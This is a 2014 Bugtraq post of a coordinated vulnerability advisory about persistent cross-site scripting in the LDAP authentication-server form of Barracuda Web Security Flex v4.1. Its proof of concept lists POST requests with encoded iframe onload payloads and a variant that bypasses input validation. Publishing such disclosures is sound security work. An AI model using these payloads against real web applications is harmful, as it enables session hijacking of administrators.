[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Barracuda Networks Web Security Flex v4.1 - Persistent Vulnerabilities (BNSEC-699)
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2014-08-25 15:39:33
Message-ID: 53FB58B5.4000808 () vulnerability-lab ! com
[Download RAW message or body]

Document Title:
===============
Barracuda Networks Web Security Flex v4.1 - Persistent Vulnerabilities (BNSEC-699)


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=750

BARRACUDA NETWORK SECURITY ID: BNSEC-699


Release Date:
=============
2014-08-22


Vulnerability Laboratory ID (VL-ID):
====================================
750


Common Vulnerability Scoring System:
====================================
4


Product & Service Introduction:
===============================
The Barracuda Web Security Service is a cloud-based web filtering service ideal for \
organizations with users in  multiple locations. With no hardware to install, this \
powerful SaaS web filter quickly and affordably lets administrators  safeguard users \
against aggressive malware while centrally managing user access to web content, \
applications, media,  file types and more. It even extends content security and \
management to off-network mobile devices – perfect for schools  that issue iPads to \
students, or any organization that relies on mobility.

As an enterprise-grade solution for web security, Barracuda Web Security Service \
saves administrators time otherwise spent  disinfecting computers and dealing with \
data breaches. Barracuda Web Security Service's intuitive web UI gives clear  \
visibility into web activity which speeds network troubleshooting and policy \
management. Interactive graphs let administrators  drill down from high-level \
overviews of the organization's web activity to fine-grained information about users, \
websites,  applications, files, bandwidth and other factors effecting performance and \
user productivity. Reporting is just as convenient  and granular with no database \
administration required. Built on a massively scalable worldwide multi-tenant \
architecture that  provides advanced web filtering to customers in fifty countries, \
Barracuda Web Security Service delivers the fastest, most  reliable web filtering in \
the industry.

(Copy of the Vendor Homepage: \
https://www.barracudanetworks.com/products/websecurityflex )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a web vulnerability in the \
official Barracuda Networks Web Security Flex v4.1 Application Service.


Vulnerability Disclosure Timeline:
==================================
2013-11-09:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-11-10:	Vendor Notification (Barracuda Networks - Bug Bounty Team)
2013-11-13:	Vendor Response/Feedback (Barracuda Networks - Bug Bounty Team)
2014-08-10:	Vendor Fix/Patch Notification (Barracuda Networks - Developer Team)
2014-08-20:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Barracuda Networks
Product: Web Security Flex 4.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation vulnerability has been discovered in the official \
Barracuda Networks Security Flex v4.1 Application Web-Application. The bug allows \
remote attackers to inject own malicious script codes in the vulnerable module on the \
application-side of the appliance service. 

The persistent vulnerability is located in the vulnerable Domain Alias, LDAP Host and \
Bind DN/Username values of the `Remote Filtering > Authentication 
> Add Authentication Server` module. Low privileged user accounts are able to inject \
> via POST method request own malicious script codes to compromise 
the appliance web-application service. The attack vector is located on the \
application-side and the request method to inject malicious conext is POST.

The security risk of the persistent vulnerabilities are estimated as medium with a \
cvss (common vulnerability scoring system) count of 4.0. Exploitation of the security \
issue requires low user inter action (view listing) & a registered low privileged web \
application user account. Successful exploitation of the security vulnerability \
results in session hijacking (manager/admin) or stable (persistent) context \
manipulation.

Request Method(s):
				[+] POST

Vulnerable Service(s):
				[+] Web Security Flex

Vulnerable Module(s):
				[+] Remote Filtering > Authentication > Add Authentication Server > TEST SETTINGS \
or SAVE + Listing!

Vulnerable Parameter(s):
				[+] Domain Alias
				[+] LDAP Host
				[+] Bind DN/Username


Proof of Concept (PoC):
=======================
The persistent web vulnerability in the exception-handling can be exploited by remote \
attackers with low privileged user account and low required user inter action.  For \
security demonstration or to reproduce the security vulnerability follow the provided \
information and steps below to continue.

Review: Domain Alias, LDAP Host and Bind DN/Username

<div class="form-result form-result-error" id="flex-global-form-result" 
style="display: block;">Unable to connect to&#8203;&#8203;&#8203;&#8203;&#8203; \
">&#8203;&#8203;&#8203;&#8203;&#8203;<iframe src="a">%20%20%20%20"><[PERSISTENT \
SCRIPT CODE INJECTION!]") <:389</iframe></div>

POST REQUEST (BLOCKED): Exception-Handling
enabled=1
domain_name=%22%3E%3Ciframe+src%3Da+onload%3Dalert(%22VL%22)+%3C
ip_address=%22%3E%3Ciframe+src%3Da+onload%3Dalert(%22VL%22)+%3C
port=389
encryption=0
bind_dn=hello23
bind_password=hello24
base_dn=iamsuperhack23
uid_attribute=sAMAccountName+check24
uid_value=bumbum
test2=1=
is_ajax=1
ajax_response_format=json


POST REQUEST (BYPASS VALIDATION): Exception-Handling
enabled=1
domain_name=%22%3E%3Ciframe+src%3Da%3E++++%22%3E%3Ciframe+src%3Da+onload%3Dalert(%22VL%22)+%3C
 ip_address=%22%3E%3Ciframe+src%3Da%3E++++%22%3E%3Ciframe+src%3Da+onload%3Dalert(%22VL%22)+%3C
 port=389
encryption=0
bind_dn=hello23
bind_password=hello24
base_dn=iamsuperhack23
uid_attribute=sAMAccountName+check24
uid_value=bumbum
test2=1
=
is_ajax=1
ajax_response_format=json


PoC: String (Bypass %20)
">Unable to connect to&#8203;&#8203;&#8203;&#8203;&#8203; \
">&#8203;&#8203;&#8203;&#8203;&#8203;<iframe src="a">%20%20%20%20"><iframe \
src=vuln-lab.com onload=alert("VL") <

Reference(s):
https://webfilteringportaldemo.barracudanetworks.com/r/cloudauth/add


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of all invalid context \
exception-handling messages values.  Disallow to redisplay the insecure input and \
filter wrong exception to prevent execution of persistent codes in the context of the \
security appliance application.


Security Risk:
==============
The security risk of the persistent exception-handling validation web vulnerability \
is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri \
(bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either  expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability-Lab or its suppliers  are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even  if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation  of \
liability for consequential or incidental damages so the foregoing limitation may not \
apply. We do not approve or encourage anybody to break  any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- \
                www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- \
                admin@evolution-sec.com
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- \
                magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- \
vulnerability-lab.com/rss/rss_upcoming.php   		- \
                vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- \
vulnerability-lab.com/list-of-bug-bounty-programs.php	- \
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to  electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by  Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website  is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material contact \
 (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright  © 2014 | Vulnerability Laboratory [Evolution Security]







-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic